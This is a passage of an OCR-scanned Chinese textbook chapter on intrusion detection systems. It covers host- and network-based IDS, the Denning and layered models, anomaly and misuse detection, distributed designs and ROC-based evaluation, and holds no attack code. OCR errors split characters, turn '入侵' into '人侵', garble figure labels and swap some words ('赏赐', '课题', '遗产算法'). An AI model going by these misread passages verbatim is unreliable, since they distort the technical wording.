检测 系统 应 当 依然 能 够 正常 工作 。 适 应 性 也 包括 和 人 侵 检 测 系统 本 身 对 其 宿主 平台 的 适应 
性 , 即 : 路 平台 工作 的 能 力 , 适 应 其 宿主 平台 软 、 硬 件 配置 的 不 同情 况 。 

4. 安全 性 与 可 用 性 要 求 

入 侵 检测 系统 必须 尽 可 能 的 完善 与 健壮 ,不 能 向 其 宿主 计算 机 系统 以 及 其 所 属 的 计算 
机 环境 中 引入 新 的 安全 问题 及 安全 隐患 。 并 且 入 侵 检 测 系统 在 设计 和 实现 时 ,应 该 考虑 可 
以 预见 的 、 针 对 该 入 侵 检 测 系统 的 类 型 与 工作 原理 的 攻击 威胁 ,及 其 相应 的 抵御 方法 。 确 保 
该 入侵 检测 系统 的 安全 性 与 可 用 性 。 

5. 有 效 性 要 求 

能 够 证 明 根据 某 一 设计 所 建立 的 入侵 检测 系统 是 切实 有 效 的 。 即 : 对 于 攻击 事件 的 错 
报 与 漏 报 能 够 控制 在 一 定 范围 内 。 


15.1.4 入 侵 检 测 系统 的 分 类 


入侵 检测 系统 按 其 检测 的 数据 来 源 , 可 分 为 基于 主机 的 人 侵 检测 系统 和 基于 网 络 的 人 
侵 检 测 系统 。 

1. 基于 主机 的 人 侵 检 测 

基于 主机 的 和 人 侵 检测 系统 使 用 验证 记录 ,以 系统 日 志和 应 用 程序 日 志 为 数据 源 ,保护 所 
在 的 主机 系统 ,其 自动 化 程度 较 高 ,并 拥有 精密 的 可 迅速 做 出 响应 的 检测 技术 。 通 常 , 基 于 
主机 的 入侵 检测 系统 可 监 探 系统 .事件 和 Windows 操作 系统 下 的 安全 记录 和 系统 记录 。 当 
有 文件 发 生变 化 时 ,入 侵 检 测 系 统 将 新 的 记录 条 目 与 攻击 标记 相 比 较 , 看 它们 是 否 匹 配 。 如 
果 匹 配 , 系 统 就 会 向 管理 员 报 警 并 向 别 的 目标 报告 ,以 采取 措施 。 如 图 15. 2 所 示 为 基于 主 
机 的 入 侵 检 测 系统 的 结构 示意 图 。 
目标 系统 


T 加 
审计 记录 
审计 记录 收集 方法 | 一 
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15.2 基于 主机 的 人 侵 检测 系统 的 结构 


基于 主机 的 入 侵 检测 系统 在 发 展 过 程 中 融入 了 其 他 技术 , 它 是 关键 的 系统 文件 和 可 执 
行文 件 的 入侵 检测 的 一 个 常用 方法 , 它 通 过 定期 检查 校 验 来 发 现 意外 的 变化 。 随 着 操作 系 
统 功能 越 来 越 复杂 ,基于 主机 的 入侵 检测 系统 ,将 面临 如 何以 适当 的 开销 实时 地 处 理 数据 量 
巨大 的 审计 信息 和 日 志 记录 等 问题 。 

2. 基于 网 络 的 人 侵 检 测 系统 

基于 网 络 的 入 侵 检测 系统 将 原始 的 网 络 包 作为 数据 源 ,利用 一 个 运行 在 随机 模式 下 的 
网 络 适配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 通信 。 基 于 网 络 的 入 侵 检 测 系统 的 攻击 辨识 
模式 使 用 4 种 常用 技术 : 模式 、 表 达 式 或 字 节 匹配 ; 频率 或 穿越 阔 值 ; 低级 事件 的 相关 性 ; 
统计 学 意义 上 的 非常 规 现象 检测 。 

如 图 15. 3 所 示 为 基于 网 络 的 入 侵 检 测 系统 。 基 于 网 络 的 入 侵 检 测 成 本 较 低 并 且 反 应 
速度 快 , 它 可 在 几 个 关键 访问 点 上 进行 策略 配置 ,以 观察 发 往 多 个 系统 的 网 络 通 信 , 因 此 并 
不 要 求 在 许多 主机 上 装载 并 管理 软件 ; 检查 所 有 包 的 头 部 从 而 发 现 恶 意 的 和 可 疑 的 行动 迹 
象 ,这 是 基于 主机 的 入 侵 检测 系统 所 无 法 办 到 的 ; 基于 网 络 的 入 侵 检 测 系统 可 以 检查 有 效 
负载 的 内 容 , 查 找 用 于 特定 攻击 的 指令 或 语法 ; 该 系统 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同 
时 将 其 检测 出 来 ,并 做 出 更 快 的 通知 和 响应 ; 同时 ,基于 网 络 的 入 侵 检 测 系统 与 主机 的 操作 
系统 无 关 。 基 于 网 络 的 入侵 检 测 系统 所 面 对 的 问题 主要 是 随 着 数据 通信 技术 的 发 展 和 网 络 
带宽 的 增加 而 迅速 增加 ,如 何 实时 地 采样 网 络 中 的 所 有 数据 包 , 并 有 效 实现 对 其 的 过 滤 。 
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图 15.3 基于 网 络 的 人 侵 检 测 技术 


15.2 入 侵 检测 的 技术 实现 


15.2.1 入 侵 检 测 模 型 


入 侵 检测 从 策略 上 来 讲 主要 分 为 异常 检测 和 误 用 检测 ,从 分 析 方 法 来 讲 , 又 可 以 分 为 基 
于 统计 的 、 神 经 网 络 和 数据 挖掘 3 类 技术 。 我 们 从 IDS 的 整体 框架 来 对 入 侵 检测 模型 进行 
划分 , 则 主要 是 3 种 : 通用 模型 .层次 化 模型 和 智能 化 模型 。 

1. 通用 入 侵 检 测 模型 

通用 入 侵 检 测 模型 的 雏形 是 由 Dorothy E. Denning 所 提出 的 ( 见 图 15. 4) ,该 模型 后 来 
又 经 过 许多 研究 者 的 改进 和 拓展 ,逐步 加 入 了 异常 检测 器 以 及 专家 系统 等 ,其 中 异常 检测 器 
用 于 统计 异常 模型 的 建立 ,专家 系统 用 来 实现 基于 规则 的 检测 。 模 型 的 3 个 主要 部 分 是 事 
件 发 生 器 (Event Generator) ,活动 记录 器 (Activity Profile) 和 规则 集 (Rule Set) 。 其 中 事件 
发 生 器 提供 网 络 活动 信息 ; 活动 记录 器 保存 监视 中 的 系统 和 网 络 状 态 ; 规则 集 用 于 事件 或 
状态 的 核查 以 及 判断 ,主要 通过 模型 .规则 ,模式 和 统计 数据 来 对 入 侵 行为 进行 判定 。 
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图 15.4 Denning 通用 入侵 检测 模型 


2. 层次 化 人 侵 检 测 模型 

层次 化 模型 是 如 今 最 常见 的 ,也 是 最 为 成 熟 的 一 种 ,其 思想 来 源 于 入 侵 检测 的 两 种 常用 
技术 , 即 误 用 检测 和 异常 检测 。 这 两 种 技术 分 别 有 利 于 已 知 和 未 知 的 两 种 入 侵 行为 判定 ,而 
其 差异 性 就 带 来 的 检测 的 层次 性 。 一 般 来 说 。 误 用 检测 比较 简单 ,效率 也 较 高 , 误 报 率 较 
低 ; 而 异常 检测 主要 针对 一 些 疑 难 的 .未知 的 情况 。 两 者 所 用 于 比较 的 信息 分 别 是 非 安 全 
行为 与 安全 行为 ,而 一 些 介 于 两 种 行为 之 间 情 况 , 则 需要 两 者 结合 , 既 可 以 通过 攻击 行为 的 
分 析 检 测 出 已 知 入 侵 。 又 确保 可 以 通过 对 安全 策略 库 和 疑似 入 侵 的 行为 进行 模式 匹配 来 检 
测 出 未 知 入 侵 种 类 ,这 就 是 层次 化 入 侵 检 测 模 型 的 基本 思想 。 另 外 从 入 侵 检 测 的 数据 来 源 
上 看 ,同样 也 分 为 网 络 数据 源 和 主机 数据 源 两 种 层次 。 

在 层次 化 的 模型 中 ,把 误 用 检测 作为 最 基本 的 环节 ,在 此 基础 上 又 结合 异常 检测 ,对 入 
侵 行为 进行 逐步 分 析 处 理 , 可 以 将 大 部 分 的 攻击 行为 检测 出 来 ,此 外 再 加 上 管理 员 的 人 工 参 
与 ,就 可 以 较 好 地 实现 对 入 侵 的 有 效 防御 。 在 实际 设计 实现 时 ,两 种 检测 手段 并 不 是 简单 地 
合并 在 一 起 ,而 是 紧密 联系 ,融合 在 整个 网 络 安全 体系 结构 当中 。 整 个 人 侵 检 测 系统 分 为 两 
大 部 分 , 即 攻击 检测 部 分 (入 侵 行为 检测 ) 和 入 侵 检 测 部 分 (入 侵 结果 检测 ) ,整个 过 程 主要 分 
成 两 个 大 的 步骤 : 入 侵 特征 提取 和 入 侵 行 为 分 析 。 如 图 15. 5 所 示 , 整 个 体系 结构 中 ,攻击 
特征 的 提取 和 行为 分 析 都 结合 在 其 中 ,两 种 方法 分 别 代表 了 基于 知识 的 入侵 检测 思想 和 基 
于 行为 的 检测 思想 ,两 种 检测 也 各 自用 于 检测 未 知 入 侵 和 监控 已 知 的 入 侵 。 


攻击 特征 提取 
/由 络 数据 着/ 攻击 信息 /| 


| 
主机 数据 源 / 王 -7 入 侵 检测 人 一 | 入 侵 行为 分 析 


入 侵 特征 提取 
fe 


图 15.5 层次 化 人 侵 检测 体系 结构 


攻击 行为 分 析 


层次 化 模型 较 之 通用 的 Denning 模型 有 如 下 优势 : 
(1) 从 数据 源 角度 来 讲 , 层 次 化 模型 针对 不 同 数据 源 , 采 用 不 同 的 特征 提取 方法 。 


Denning 模型 利用 一 个 事件 发 生 器 来 处 理 所 有 的 审计 数据 和 网 络 数据 包 , 但 事实 上 两 种 教 
据 有 很 大 差异 。 层 次 化 模型 将 数据 源 分 成 两 个 层次 ,采用 不 同 的 特征 提取 和 行为 分 析 方式 
处 理 , 提 高 了 检测 效率 与 准确 度 。 

(2) 用 攻击 特征 库 和 安全 策略 库 代 替 了 活动 记录 。Denning 模型 中 把 所 有 信息 存放 于 
活动 记录 当中 ,这 就 导致 检测 效率 偏 低 ,而 在 层次 化 模型 中 ,把 已 知 的 攻击 行为 存储 在 攻击 
特征 库 , 处 理 未 知人 侵 行为 的 正常 行为 模式 和 安全 策略 则 存放 在 安全 策略 库 中 ,两 个 库 各 有 
所 长 ,拥有 不 同 的 存储 格式 ,解决 不 同 的 网 络 行为 问题 。 

(3) 以 分 布 式 取代 了 单一 的 结构 。 层 次 化 人 侵 检测 模型 可 以 方便 地 应 用 到 分 布 式 的 人 
侵 检 测 环境 中 。 特 征 提取 和 行为 分 析 模 块 可 以 有 各 个 代理 来 实现 ,并 通过 代理 的 交互 与 协 
作 , 处 理 大 规模 的 分 布 式 人 侵 行为 。 

3. 智能 入侵 检测 模型 

入 侵 检 测 中 ,对 于 已 知行 为 ,通常 采用 误 用 检测 的 方法 。 一 般 来 说 , 误 用 检测 对 智能 性 
的 要 求 较 低 , 异 常 检测 主要 针对 未 知 入 侵 , 因 此 通常 需要 很 高 的 智能 特性 。 目 前 大 多 数 的 入 
侵 检 测 系统 是 基于 主机 的 ,主要 是 通过 单个 主机 收集 数据 信息 .或 者 通过 分 布 在 网 络 各 个 主 
机 的 监视 模块 来 收集 数据 信息 ,并 统一 提交 给 一 个 中 心 处 理 器 来 完成 检测 功能 。 这 种 入 侵 
检测 的 模型 不 能 很 好 的 满足 大 规模 分 布 式 的 网 络 环 境 , 特 别 是 在 中 心 处 理 器 出 现 故 障 、 数 据 
海量 、 网 络 结构 扩展 等 情况 发 生 时 ,其 局 限 性 更 加 明显 。 

随 着 智能 代理 技术 的 不 断 发 展 。 其 分 布 式 、 自 治 和 协同 工作 能 力 给 入 侵 检 测 技术 带 来 
新 的 生机 。 目 前 的 人 工 智能 工程 已 经 转向 以 智能 代理 技术 为 基础 组 织 结构 ,代理 作为 执行 
安全 监视 和 入 侵 检测 功能 的 软件 代理 , 它 可 以 在 有 或 者 没有 其 他 代理 的 条 件 下 工作 ,可 接受 
更 高 层 其 他 实体 的 控制 命令 。 代 理 既 可 以 执行 简单 特定 的 功能 ,也 可 以 执行 复杂 的 行为 。 
作为 人 侵 检 测 智 能 模型 的 核心 ,代理 的 效率 与 性 能 决定 了 整个 IDS 的 价值 。 基 于 代理 的 入 
侵 检 测 模 型 如 图 15. 6 所 示 。 
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图 15.6 基于 代理 的 智能 入 侵 检测 模型 
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该 模型 主要 包括 主机 检测 代理 、 网 络 检测 代理 、 通 信 代 理 、 响 应 代理 以 及 一 个 控制 台 。 
不 同 种 类 的 代理 具有 不 同 的 特征 和 处 理 功 能 ,可 以 对 其 自由 配置 ,独立 进行 操作 。 同 种 代理 
以 及 不 同 代理 之 间 都 可 以 通过 代理 通信 语言 (Agent Communication Language, ACL) 来 进 
行 信息 交互 ,从 而 进行 协同 工作 。 


15.2.2 误 用 与 异常 检测 


入 侵 检 测 技术 可 以 分 为 异常 检测 和 误 用 检测 两 种 。 

1. 异常 检测 

异常 检测 技术 (Anomaly Detection) 也 称 为 基于 行为 的 检测 技术 ,是 指 根据 用 户 的 行为 
和 系统 资源 的 使 用 状况 判断 是 否 存 在 网 络 入 侵 。 异 常 检 测 模 型 如 图 15.7 所 示 。 
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图 15.7 异常 检测 模型 


异常 检测 技术 首先 假设 网 络 攻击 行为 是 不 常见 的 或 是 异常 的 ,区 别 于 所 有 的 正常 行为 。 
如 果 能 够 为 用 户 和 系统 的 所 有 正常 行为 总 结 活动 规律 并 建立 行为 模型 ,那么 入 侵 检测 系统 
可 以 将 当前 捕获 到 的 网 络 行为 与 行为 模型 相对 比 , 若 人 侵 行为 偏离 了 正常 的 行为 轨迹 ,就 可 
以 被 检测 出 来 。 异 常 检测 的 关键 是 选 一 个 区 分 异常 事件 与 人 侵 活动 的 阔 值 ,从 而 减少 漏 报 
和 误 报 的 问题 。 

异常 检测 的 优点 是 : 它 的 检测 完整 性 高 .能 发 现 企 图 发 气 和 试探 系统 未 知 漏洞 的 行为 ; 
较 少 依赖 于 特定 的 操作 系统 ; 对 合法 的 用 户 违反 权限 的 行为 具有 很 强 的 检测 能 力 。 它 的 缺 
点 是 : 如 果 是 在 用 户 数量 多 且 运 行 状态 复杂 的 环境 中 , 它 的 误 警 率 较 高 ; 由 于 系统 活动 的 
不 断 变化 ,用 户 要 不 断 地 在 线 学 习 。 

常用 的 方法 有 : 

(1) 量化 分 析 一 一 将 检测 规则 和 属性 以 数值 形式 表示 。 最 常用 的 量化 分 析 法 有 阔 值 检 
测 和 目标 集成 检查 。 阔 值 检 测 对 系统 中 的 某 种 操作 或 事件 进行 计数 , 若 有 实际 操作 超过 计 
数 允许 的 上 限 , 别 被 视 为 非法 ,目标 集成 检查 法 检查 目标 客体 ,获得 其 关键 参数 并 存储 起 来 ， 
再 定期 检查 课题 并 与 赏赐 获得 的 关键 参数 相 比较 , 若 发 现 差别 , 则 视 为 异常 出 错 。 

(2) 统计 法 一 一 此 方法 选取 有 效 的 数据 采集 点 ,把 得 到 的 用 户 活动 汇编 为 记录 ,再 分 析 
所 采集 到 的 数据 以 判断 用 户 的 活动 是 否 合法 。 统 计 法 支持 对 主体 的 活动 特征 的 学 习 , 但 是 
它 没有 分 析 事件 发 生 的 顺序 的 能 力 。 

(3) 预测 模式 生成 法 一 一 此 方法 把 用 户 的 实际 活动 特征 分 为 异常 活动 集合 和 正常 活动 
集合 ,每 个 集合 有 自己 的 算法 ,然后 根据 已 知 的 事件 模型 按照 时 间 顺 序 分 析 得 出 一 系列 规 
则 ,并 不 断 更 新 ,依靠 最 后 得 到 的 最 完善 规则 来 预测 下 一 步 可 能 要 发 生 的 事件 。 

(4) 神经 网 络 一 一 使 用 自 适应 学 习 技 术 来 描述 异常 行为 。 神 经 网 络 的 工作 过 程 是 : 收 


集 用 户 的 行为 特征 并 生成 模型 ,与 网 络 实时 接收 的 用 户 操作 参数 进行 比较 ,以 图 发 现 可 以 之 
处 。 但 它 有 可 能 过 于 敏感 地 学 习 某 种 行为 事件 来 丰富 自身 的 特征 模型 ,这 样 就 可 能 导致 误 
报警 ,影响 了 检测 的 准确 性 。 

(5) 基于 免疫 学 方法 一 一 人 的 免疫 系统 具有 识别 “自我 / 非 自 我 ”的 特点 ,基于 免疫 学 的 
IDS, 其 思想 是 : 对 于 一 个 特定 的 进程 (程序 ) ,系统 调用 序列 是 相对 稳定 的 ,使 用 系统 调用 序 
列表 征 主 机 的 “自我 ”, 任 何 有 别 于 这 种 “自我 ”的 系统 调用 都 被 认为 是 “ 非 自 我 ?的 , 即 异 
常 的 。 

2. 误 用 检测 

误 用 检测 使 用 某 种 模式 或 特征 描述 方法 对 任何 已 知 的 攻击 进行 表达 。 误 用 检测 需要 确 
定 其 所 定义 的 攻击 特征 模式 是 否 可 以 覆盖 与 实际 攻击 有 关 的 所 有 要 素 。 当 入 侵 者 入 侵 时 ， 
即 通过 它 的 某 些 行为 过 程 建立 一 种 入 侵 模 型 ,如 果 该 行为 与 入侵 方案 的 模型 一 致 , 即 判 定 为 
和 人 侵 行为 。 误 用 检测 模型 如 图 15. 8 所 示 。 
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图 15.8 误 用 检测 模型 


误 用 检测 的 优点 是 : 检测 的 准确 性 高 ; 由 于 可 以 精确 描述 入 侵 行 为 ,因此 虚 警 率 低 。 
它 的 缺点 是 : 检测 的 完整 性 要 取决 于 数据 库 的 及 时 更 新 程度 ; 收集 已 经 攻击 行为 和 系统 脆 
弱 性 信息 困难 ; 可 移植 性 差 并 且 难 以 检测 内 部 用 户 的 权限 滥用 。 

误 用 检测 往往 也 被 称 为 基于 特征 的 检测 。 大 部 分 商业 IDS 产品 采用 误 用 检测 技术 , 常 
用 的 误 用 检测 方法 有 : 

(1) 模式 匹配 一 一 模式 匹配 的 基本 思想 是 : 提取 各 种 攻击 的 特征 (协议 IP 地址、 服务 
器 端口 等 ) ,建立 用 语 检测 的 特征 库 , 从 而 以 特征 库 为 依据 来 识别 大 量 的 攻击 和 试探 。 模 式 
匹配 的 突出 优点 是 算法 简单 .准确 率 高 。 但 是 该 方法 只 能 识别 已 知 攻击 ,而且 对 于 高 速 大 规 
模 网 络 , 由 于 要 处 理 分 析 大 量 的 数据 包 ,速度 很 成 问题 。 

(2) 专家 系统 一 一 专家 系统 是 基于 一 套 由 专家 经 验 事先 定义 的 规则 的 推理 系统 ,通常 
是 着 重 有 特征 的 人 侵 行 为 。 例 如 : 在 数 分 钟 内 某 用 户 连续 进行 登录 ,只 要 失败 3 次 就 可 以 
被 认为 是 一 种 攻击 行为 。 专 家 系统 对 历史 数据 的 依赖 性 较 少 ,因此 对 系统 适应 性 比较 强 , 可 
以 灵活 适应 比较 广泛 的 安全 策略 和 检测 需求 ,专家 系统 的 关键 在 于 入 侵 特 征 的 提取 与 表 
达 , 然 而 在 实际 应 用 中 ,入 侵 特征 的 提取 难度 较 大 ,速度 往往 难于 满足 实际 需要 ,这 是 主 
要 缺点 。 

(3) 完整 性 分 析 一 一 完整 性 分 析 主 要 关注 某 个 文件 或 对 象 是 否 被 更 改 , 这 经 常 包括 文 
件 和 目录 的 内 容 和 属性 , 它 在 发 现 被 更 改 的 ,被 特洛伊 化 的 应 用 程序 方面 特别 有 效 , 其 主要 
优点 是 只 要 攻击 导致 了 文件 或 对 象 有 任何 改变 , 它 都 能 够 发 现 。 缺 点 是 只 能 用 于 事后 分 析 
而 不 能 用 于 实时 响应 。 
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(4) 协议 分 析 一 一 在 协议 分 析 方法 中 ,协议 将 被 解码 ,如果 设置 了 IP 分 片 标志 ,数据 包 
将 会 先进 行 重组 ,然后 青 详细 分 析 是 否 具有 攻击 行为 。 通 过 数据 包 重 组 ,系统 可 以 检测 到 如 
数据 分 片 .TCP 或 RPC 段 边 界 欺骗 等 规避 技术 的 攻击 。 

(5) 状态 转移 分 析 一 一 攻击 行为 是 攻击 者 执行 的 操作 系列 ,是 系统 从 某 些 初始 状态 转 
移 到 危及 系统 安全 的 状态 。 初 始 状态 是 攻击 开始 前 的 状态 ,危及 系统 安全 的 状态 为 已 成 功 
攻击 时 刻 的 状态 。 在 初始 状态 和 危及 系统 安全 状态 之 间 , 可 能 存在 一 个 或 多 个 中 间 转 移 状 
态 。 标 识 初始 状态 和 危及 系统 安全 状态 后 ,分 析 两 个 状态 之 间 的 状态 转移 ,用 状态 转移 图 或 
专家 系统 规则 来 描述 状态 间 的 转移 信息 。 状 态 转移 分 析 考 虑 攻击 行为 对 每 步 系统 状态 转移 
的 影响 ,可 检测 协同 攻击 和 利用 用 户 会 话 的 攻击 行为 。 但 状态 转移 分 析 技 术 只 适用 于 对 攻 
击 步骤 之 间 存在 全 序 关 系 行为 的 检测 。 

异常 检测 技术 和 误 用 检测 技术 的 比较 : 基于 异常 检测 技术 的 入 侵 检测 系统 如 果 想 检测 
到 所 有 的 网 络 入 侵 行为 ,必须 掌握 被 保护 系统 已 知行 为 和 预期 行为 的 所 有 信息 ,这 一 点 实际 
上 无 法 做 到 ,因此 入 侵 检测 系统 必须 不 断 地 学 习 并 更 新 已 有 的 行为 轮廓 。 对 于 基于 误 用 检 
测 技术 的 和 人 侵 检测 系统 而 言 , 只 有 拥有 所 有 可 能 的 人 侵 行为 的 先 验 知识 ,而 且 必 须 能 识别 各 
种 人 侵 行为 的 过 程 细节 或 者 每 种 人 侵 行 为 的 特征 模式 ,才能 检测 到 所 有 的 入侵 行为 ,而 这 种 
情况 也 是 不 存在 的 ,该 类 入 侵 检 测 系统 只 能 检测 出 已 有 的 人 侵 模式 ,必须 不 断 地 对 新 出 现 的 
入 侵 行 为 进行 总 结 和 归纳 。 

在 和 人 侵 检 测 系统 的 配置 方面 ,基于 异常 检测 技术 的 人 侵 检测 系统 通常 比 基 于 误 用 检测 
技术 的 入侵 检测 系统 所 做 的 工作 要 少 很 多 ,因为 异常 检测 需要 对 系统 和 用 户 的 行为 轮廓 进 
行 不 断 地 学 习 更 新 ,需要 做 大 量 的 数据 分 析 处 理工 作 ,要 求 管理 员 能 够 总 结 出 被 保护 系统 的 
所 有 正常 行为 状态 ,对 系统 的 已 知 和 期 望 行为 进行 全 面 的 分 析 , 因 此 配置 难度 相对 较 大 。 但 
是 ,有 些 基 于 误 用 检测 技术 的 入 侵 检 测 系 统 允许 管理 员 对 入 侵 特征 数据 库 进 行 修改 ,甚至 允 
许 管 理 员 自己 根据 所 发 现 的 攻击 行为 创建 新 的 网 络 人 侵 特征 规则 记录 ,这 种 人 侵 检测 系统 
在 系统 配置 方面 的 工作 量 会 显著 增加 。 


15.2.3 分 布 式 入 侵 检 测 


传统 的 入 侵 检 测 系统 采用 的 是 集中 式 结构 ,因此 系统 中 的 数据 收集 .分 析 和 响应 等 模块 
都 集中 运行 在 一 台 主 机 上 ,这 样 的 操作 虽然 简单 ,但 是 随 着 网 络 的 快速 发 展 和 网 络 上 数据 流 
量 的 剧 增 , 用 一 台 计 算 机 无 法 负担 所 有 的 入 侵 检 测 工 作 , 并 且 这 种 集中 式 的 入 侵 检测 系统 还 
存在 着 单 点 失效 的 问题 。 如 果 这 台 主 机 受到 了 攻击 而 停止 工作 ,那么 整个 网 络 将 处 于 危 
险 中 。 

分 布 式 人 侵 检测 系统 是 由 分 布 在 网 络 上 不 同位 置 的 检测 部 件 所 组 成 的 , 它 不 仅 能 检测 
到 针对 单个 主机 的 和 人 侵 , 也 能 检测 到 针对 整个 网 络 的 入 侵 。 分 布 式 人 侵 检测 系统 在 很 大 程 
度 上 解决 了 传统 集中 式 人 侵 检测 系统 处 理 能 力 有 限 且 容易 单 点 失效 的 缺点 。 

分 布 式 人 侵 检 测 系统 可 以 分 为 3 种 类 型 。 

1. 层次 式 

层次 式 人 侵 检测 系统 将 数据 收集 的 工作 分 布 在 整个 网 络 中 ,并 将 所 获取 的 数据 传送 到 
更 高 一 层 的 分 布 式 数 据 分 析 模 块 , 经 过 初步 分 析 后 将 结果 送 入 全 局 的 分 析 模 块 进行 判断 和 
决策 。 层 次 式 人 侵 检测 系统 的 缺点 在 于 难以 完全 适应 网 络 拓扑 的 变化 ,如 果 上 层 的 入 侵 检 


测 模块 受到 攻击 , 则 该 系统 的 有 效 性 要 大 大 降低 。 

2. 协作 式 

协作 式 入 侵 检测 系统 的 数据 分 析 模 块 相对 独立 ,因此 具有 较 层次 式 入 侵 检 测 系统 更 好 
的 独立 性 。 它 的 缺点 是 存在 单 点 失效 的 风险 。 

3. 对 等 式 

对 等 式 人 侵 检测 系统 的 各 模块 地 址 和 作用 都 平等 ,因此 整个 系统 拥有 很 好 的 伸缩 性 , 真 
正 避 免 了 单 点 失效 。 对 等 式 人 侵 检测 系统 所 面临 的 问题 是 入 侵 检 测 系统 同伴 间 的 通信 较为 


15.2.4 其 他 检测 技术 


入 侵 检 测 系统 的 研究 方向 之 一 是 将 各 个 领域 的 研究 成 果 应 用 于 入 侵 检 测 中 ,以 形成 更 
高 效 .更 为 智能 化 的 检测 算法 ,以 提高 人 侵 检 测 的 应 用 价值 。 目 前 研究 的 重点 有 遗传 算法 和 
免疫 技术 等 。 

1. 遗传 算法 

遗传 算法 可 以 用 来 产生 人 侵 检测 系统 的 规则 ,这些 规则 是 根据 已 知 的 网 络 连接 构成 的 
数据 库 来 自动 产生 的 。 产 生 的 规则 用 来 区 分 正常 的 网 络 连 接 和 异常 的 网 络 连接 。 异 常 的 网 
络 连接 就 是 指 可 能 的 人 侵 活动 。 存 储 在 规则 库 中 的 规则 一 般 是 以 下 形式 : if{condition} 
then{act}。 

这 里 的 条 件 通 常 是 指 当 前 网 络 连 接 和 IDS 中 的 规则 是 否 匹配 ,比如 源 IP 地 址 、 目 的 IP 
地 址 、 端 口号 等 。 动 作 通常 是 指 安全 策略 定义 的 对 异常 的 反应 ,比如 给 系统 管理 员 报 警 将 
可 能 的 入 侵 存 人 日 志 等 。 

应 用 遗产 算法 的 最 终 目的 就 是 产生 只 匹配 异常 连接 的 规则 。 这 些 规 则 在 历史 网 络 连接 
上 测试 ,并 且 应 用 在 过 滤 新 的 网 络 连接 上 检测 可 能 的 入 侵 攻击 。 

2. 免疫 技术 

免疫 技术 应 用 了 生物 医学 中 的 免疫 系统 原理 。 处 于 网 络 环境 中 的 主机 之 所 以 受到 入 
侵 , 是 因为 主机 系统 本 身 以 及 所 运行 的 应 用 程序 存在 着 各 种 脆弱 性 因素 ,网 络 攻击 者 正 是 利 
用 这 些 漏 洞 来 侵入 到 主机 系统 中 的 ; 在 生物 系统 中 同样 存在 各 种 脆弱 性 因素 ,因此 会 受到 
病毒 .病菌 的 攻击 。 而 生物 体 拥有 免疫 系统 来 负责 检测 和 抵御 人 侵 ,免疫 机 制 包括 特异 性 免 
疫 和 非特 异性 免疫 。 特 异性 免疫 针对 于 特定 的 某 种 病毒 ,非特 异性 免疫 可 用 于 检测 和 抵制 
以 前 从 未 体验 过 的 人 侵 类 型 。 


15.3 ”入侵 检测 技术 的 性 能 指标 和 评估 标准 


15.3.1 影响 入 侵 检 测 系统 的 性 能 指标 


在 分 析 IDS 的 性 能 时 ,主要 考虑 检测 系统 的 有 效 性 效率 和 可 用 性 。 有 效 性 研究 检测 
机 制 的 检测 精确 度 和 系统 检测 结果 的 可 信 度 , 它 是 开发 设计 和 应 用 IDS 的 前 提 和 目的 ,是 
测试 评估 IDS 的 主要 指标 ,效率 则 从 检测 机 制 的 处 理 数据 的 速度 以 及 经 济 性 的 角度 来 考 
虑 ,也 就 是 侧重 检测 机 制 性 能 价格 比 的 改进 。 可 用 性 主要 包括 系统 的 可 扩展 性 用 户 界面 的 
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可 用 性 、 部 署 配 置 的 方便 程度 等 方面 。 有 效 性 是 开发 设计 和 应 用 IDS 的 前 提 和 目的 ,因此 
也 是 测试 评估 IDS 的 主要 指标 ,但 效率 和 可 用 性 对 IDS 的 性 能 也 起 着 很 重要 的 作用 。 效 率 
和 可 用 性 渗透 于 系统 设计 的 各 个 方面 之 中 。 本 节 从 检测 的 有 效 性 、 效 率 以 及 可 用 性 角度 ,对 
测试 评估 IDS 的 性 能 指标 进行 分 析 讨 论 。 

1. 检测 率 、 虚 警 率 及 检测 可 信和 度 

检测 率 是 指 被 监控 系统 在 受到 入 侵 攻击 时 ,检测 系统 能 够 正确 报警 的 概率 。 虚 警 率 是 
指 检测 系统 在 检测 时 出 现 虚 警 的 概率 。 检 测 可 信和 度 也 就 是 检测 系统 检测 结果 的 可 信 程 度 ， 
这 是 测试 评估 IDS 的 最 重要 的 指标 。 

实际 的 IDS 的 实现 总 是 在 检测 率 和 虚 警 率 之 间 徘 徊 ,检测 率 高 了 , 虚 警 率 就 会 提高 ; 同 
样 虚 警 率 降 低 了 ,检测 率 也 就 会 降低 。 一 般 地 ,IDS 产品 会 在 两 者 中 取 一 个 折 中 ,并 且 能 够 
进行 调整 ,以 适应 不 同 的 网 络 环境 。 美国 的 林肯 实验 室 用 接收 器 特性 (ROC, Receiver 
Operating Characteristic) 有 曲线 来 描述 IDS 的 性 能 。 该 曲线 准确 刻画 了 IDS 的 检测 率 与 虚 
警 率 之 间 的 变化 关系 。ROC 广泛 用 于 输入 不 确定 的 系统 的 评估 。 根 据 一 个 IDS 在 不 同 的 
条 件 ( 在 允许 范围 内 变化 的 阔 值 ,例如 异常 检测 系统 的 报警 门限 等 参数 ) 下 的 虚 警 率 和 检测 
率 , 分 别 把 虚 警 率 和 检测 率 作 为 横 坐 标 和 纵 坐标 ,就 可 做 出 对 应 于 该 IDS 的 ROC 曲线 。 
ROC 曲线 与 IDS 的 检测 门限 具有 对 应 的 关系 。 

在 测试 评估 IDS 的 具体 实施 过 程 中 ,除了 要 IDS 的 检测 率 和 虚 警 率 之 外 ,往往 还 会 单 
独 考虑 与 这 两 个 指标 密切 相关 的 一 些 因素 ,比如 能 检测 的 入侵 特征 数量 IP 碎片 重组 能 力 、 
TCP 流 重组 能 力 。 显 然 , 能 检测 的 入 侵 特征 数量 越 多 ,检测 率 也 就 越 高 。 此 外 ,由 于 攻击 者 
为 了 加 大 检测 的 难度 甚至 绕 过 IDS 的 检测 ,常常 会 发 送 一 些 特别 设计 的 分 组 。 为 了 提高 
IDS 的 检测 率 , 降 低 IDS 的 虚 警 率 ,IDS 常常 需要 采取 一 些 相应 的 措施 ,比如 IP 碎片 能 力 、 
TCP 流 重 组 。 因 为 分 析 单 个 的 数据 分 组 会 导致 许多 误 报 和 漏 报 , 所 以 IP 碎片 的 重组 可 以 
提高 检测 的 精确 度 。IP 碎片 重组 的 评测 标准 有 3 个 性 能 参数 : 能 重组 的 最 大 IP 分 片 数 ;能 
同时 重组 的 IP 分 组 数 ; 能 进行 重组 的 最 大 IP 数据 分 组 的 长 度 ,TCP 流 重 组 是 为 了 对 完整 
的 网 络 对 话 进行 分 析 , 它 是 网 络 IDS 对 应 用 层 进行 分 析 的 基础 。 如 检查 邮件 内 容 。 附 件 ， 
